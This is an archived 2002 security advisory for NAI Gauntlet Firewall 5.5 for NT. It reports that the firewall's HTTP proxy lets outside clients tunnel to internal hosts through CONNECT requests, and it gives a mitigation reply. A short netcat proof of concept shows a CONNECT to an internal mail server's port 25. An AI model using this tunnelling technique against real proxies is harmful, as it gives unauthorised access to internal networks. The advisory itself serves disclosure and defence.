Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Security App Flaws :: win5155.htm

NAI Gauntlet Firewall HTTP CONNECT TCP Tunnel Vulnerability



1st Mar 2002 [SBWID-5155]
COMMAND

	NAI Gauntlet Firewall HTTP CONNECT TCP Tunnel Vulnerability

SYSTEMS AFFECTED

	NAI Gauntlet Firewall 5.5 for NT

PROBLEM

	Rashed Alabbar reported that NAI  Gauntlet  Firewall  is  vulnerable  to
	HTTP CONNECT TCP Tunnel Vulnerability when acting as proxy.
	

	See  http://www.securitybugware.org/Other/5112.html  for  details  about
	this vulnerability.
	

	

	

	Client = x.x.x.x

	Gauntlet = y.y.y.y

	Internal Mailserver = z.z.z.z

	

	nc -v -n y.y.y.y 80

	(UNKNOWN) [y.y.y.y] 80 (?) open

	CONNECT z.z.z.z:25 HTTP/1.0

	

	HTTP/1.0 200 OK

	

	mail server banner

	

SOLUTION

	Colin Campbell answered :
	

	It is (or at least I thought it was) well known that an http-gw in  both
	Gauntlet and the fwtk should NEVER listen on the external address. On  a
	Gauntlet system use the bind-address directive to make sure it  doesn\'t
	listen. To be doubly sure set up the appropriate packet filters to  stop
	incoming connections. On a fwtk system I don\'t recall the  bind-address
	directive being present  so  I  always  used  packet  filters  to  block
	incoming connections.
	

	If you must \"reverse proxy\", use plug-gw. Better  still  put  a  proxy
	outside the firewall and plug  it  through  the  firewall  to  the  real
	server.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH